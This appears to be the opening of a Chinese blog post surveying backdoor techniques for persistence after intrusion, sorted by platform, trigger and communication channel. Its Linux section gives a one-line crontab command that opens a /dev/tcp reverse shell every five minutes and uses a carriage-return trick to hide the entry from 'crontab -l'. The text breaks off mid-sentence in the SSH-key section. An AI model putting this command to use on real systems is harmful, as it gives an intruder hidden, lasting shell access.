<div class="blogpost-body" id="cnblogs_post_body">
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-family:'微软雅黑', 'Microsoft YaHei';">前言</span></strong></span></p>
<hr>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';text-indent:2em;">没有最好的后门,只有最合适的后门。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';color:#ff0000;">时光荏苒,岁月如梭,在这篇文章里,我将对后门的各种形式进行解读和总结,这不仅仅是能帮你找到回忆,更希望的是能给予大家帮助、启发思考。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">后门种类繁多,林林总总,根据不同的需求出现了很多奇怪好玩的后门。它可以是一行简单的代码,也可以是复杂的远控木马,它可以是暴力的,也可以是很优雅的。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">在整体架构上,一个优秀的后门应该充分考虑其功能、触发方式和通信方式等方面。针对不同的方面,杀软也会根据其特征进行处理。为了进一步的持续性控制以及后渗透,后门越显复杂化。从后门的发展史中可看出,这是一场攻与防的持续性较量。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">从终端平台的角度看,后门可分为Linux型、Windows型和IOT型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">对于Linux而言,从后门的形式上看,可分为配置型、logger型和rookit型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">对于windows而言,从后门触发方式的角度看,可分为Registry型、Schtasks型和WMI型;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">从通信方式的角度看,后门可分为http/https型、irc型、dns型、icmp型等等;</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">从网站应用的角度看,后门可分为模块扩展型、后端语言型和配置文件型。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">......</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-family:'微软雅黑', 'Microsoft YaHei';"> </span></strong></span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-size:18px;"><strong><span style="font-size:18px;font-family:'微软雅黑', 'Microsoft YaHei';">终端类</span></strong></span></p>
<hr>
<p style="text-indent:2em;text-align:left;"><span style="color:#0070c0;"><strong><span style="color:#0070c0;font-family:'微软雅黑', 'Microsoft YaHei';text-indent:2em;">一. Linux后门</span></strong></span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';color:#ff0000;">1. 配置型</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">这里的配置型是指借助Linux系统本身的一些特性来完成后门布置功能。</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';color:#00b050;">1.1 crontab后门</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">运维经常会用到该命令,这相当于windows的计划任务,规定时间来执行指定命令。这通常与反弹shell一起运用。</span></p>
<table border="0" cellpadding="0" cellspacing="0" class="syntaxhighlighter plain"><tbody><tr><td class="gutter">
<div class="line number1 index0 alt2">
1
</div> </td><td class="code">
<div>
<div class="line number1 index0 alt2">
<code class="plain">(crontab -l;printf "*/5 * * * * exec9<> /dev/tcp/localhost/8080&&exec0<&9&&exec1>&92>&1&&/bin/bash --noprofile –I;\rno crontab for `whoami`%100c\n")|crontab -</code>
</div>
</div> </td></tr></tbody></table>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';text-indent:2em;color:#00b050;">1.2 ssh公钥免密</span></p>
<p style="text-indent:2em;text-align:left;"><span style="font-family:'微软雅黑', 'Microsoft YaHei';">将客户端生成的ssh公钥 |
|
转播
